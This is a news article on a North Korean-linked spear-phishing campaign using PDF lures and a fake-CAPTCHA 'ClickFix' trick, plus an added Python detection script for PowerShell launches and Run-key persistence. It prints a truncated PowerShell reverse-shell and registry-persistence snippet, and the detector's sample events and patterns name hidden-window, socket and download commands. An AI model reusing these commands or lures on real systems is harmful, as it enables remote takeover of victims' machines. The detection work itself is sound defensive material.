A North Korean-linked cyber espionage group known as Velvet Chollima has launched a targeted campaign against South Korean government officials. The group is using malicious PDF documents and advanced social engineering to compromise systems in South Korea and beyond.
The campaign, active since January 2025, targets a wide range of entities. These include NGOs, government agencies, and media organizations across North America, South America, Europe, and East Asia.
Spear-Phishing With Weaponized PDFs
Velvet Chollima’s attacks begin with spear-phishing emails. These messages contain PDF attachments that appear to come from trusted South Korean officials. The documents are designed to deceive recipients and establish initial contact with high-value targets.
Once the attackers gain the victim’s trust, they proceed to deliver malicious content. This method of slow engagement increases the chances of a successful attack.
Offensive Security Engineer Abdulrehman Ali identified the attack during an adversary simulation. His research was supported by threat intelligence from Microsoft.
Fake CAPTCHA and the ClickFix Technique
When victims open the PDFs, they are redirected to fake device registration pages. These pages use a tactic called ClickFix, which presents a bogus CAPTCHA to the user.
The CAPTCHA is not real. Instead, it tricks users into running dangerous PowerShell commands. These commands give attackers remote access and control over the victim’s system. Because users run the commands themselves, many security systems fail to detect the intrusion.
Infection and Persistence
The attack relies on a fake CAPTCHA interface that silently copies a PowerShell script to the user’s clipboard. If executed, the script opens a reverse shell to the attacker and modifies the Windows registry to maintain access even after reboot.
while ($true) {
try {
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10', 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
# Registry persistence
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Set-ItemProperty -Path $regPath -Name $regName -Value $regValue
}
This script allows the attackers to execute commands remotely and ensures the system remains compromised over time.
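The two behaviours described above leave distinct traces in endpoint telemetry: a PowerShell process that a user launched by hand from the Run dialog or File Explorer (so its parent is explorer.exe) with arguments such as a hidden window or a raw TCP socket, and a Run-key value written that points at a script host. The detection logic below is an added example, not code from the article or from the researcher it cites; the events are constructed, simplified Sysmon-style records (Event ID 1 process creation, Event ID 13 registry value set), and the explorer.exe parent check assumes the pasted command is executed through the Run dialog rather than an already-open console.

```python
"""Detect ClickFix-style PowerShell launches and Run-key persistence in
constructed, Sysmon-like event records (not real telemetry)."""
import re

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Command-line fragments seldom seen in a user's own interactive PowerShell use
# but typical of pasted one-liners: hidden window, raw sockets, encoded or
# downloaded script bodies, clipboard reads.
RISKY_CMDLINE = re.compile(
    r"-w(?:in(?:dowstyle)?)?\s+hidden"      # -w hidden / -win hidden / -WindowStyle Hidden
    r"|System\.Net\.Sockets\.TCPClient"     # raw TCP connection, as in the reverse shell above
    r"|Invoke-Expression|\biex\b"
    r"|DownloadString|DownloadFile"
    r"|-e(?:c|nc|ncodedcommand)?\b"         # -EncodedCommand and its accepted prefixes
    r"|FromBase64String|Get-Clipboard",
    re.IGNORECASE,
)

# Logon autostart locations; Sysmon reports them under HKU\<SID>\..., PowerShell as HKCU:\...
RUN_KEY = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE
)

# Interpreters that a legitimate Run value rarely launches directly.
SCRIPT_HOSTS = re.compile(
    r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32", re.IGNORECASE
)

# Constructed sample events (hypothetical paths and SID).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\'192.168.1.10\',4444)"'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoExit -ExecutionPolicy RemoteSigned"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Users\a\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "powershell.exe -File build.ps1"},
    {"id": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdateCheck",
     "details": r"powershell.exe -w hidden -nop -File C:\Users\a\AppData\Roaming\update.ps1"},
    {"id": 13, "image": r"C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_powershell(event):
    """Event ID 1: PowerShell spawned by explorer.exe with risky arguments."""
    if event.get("id") != 1:
        return None
    if _basename(event.get("image", "")) not in POWERSHELL_IMAGES:
        return None
    if _basename(event.get("parent", "")) != "explorer.exe":
        return None
    m = RISKY_CMDLINE.search(event.get("cmdline", ""))
    return f"powershell launched from explorer.exe with '{m.group(0)}'" if m else None


def run_key_persistence(event):
    """Event ID 13: a Run/RunOnce value whose data launches a script host."""
    if event.get("id") != 13:
        return None
    target = event.get("target", "")
    if not RUN_KEY.search(target):
        return None
    details = event.get("details", "")
    if SCRIPT_HOSTS.search(details) or RISKY_CMDLINE.search(details):
        value_name = target.rsplit("\\", 1)[-1]
        return f"autorun value {value_name} set to '{details[:60]}'"
    return None


RULES = {"clickfix_powershell": clickfix_powershell,
         "run_key_persistence": run_key_persistence}


def scan(events):
    """Run every rule over every event; return one finding per (rule, event) hit."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            reason = rule(ev)
            if reason:
                findings.append({"rule": name, "reason": reason, "event": ev})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['reason']}")
```

The two rules are deliberately independent: the process-creation rule catches the initial paste even if persistence is never written, and the registry rule catches persistence written by any process, not only PowerShell. The benign explorer-launched PowerShell and the OneDrive autorun value in the sample set show what each rule is expected to leave alone.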
Conclusion
Velvet Chollima’s campaign marks a new level of sophistication in cyber attacks. By combining technical skill with psychological manipulation, the group has managed to bypass traditional defenses. Government agencies and organizations are advised to remain vigilant and educate staff on phishing threats.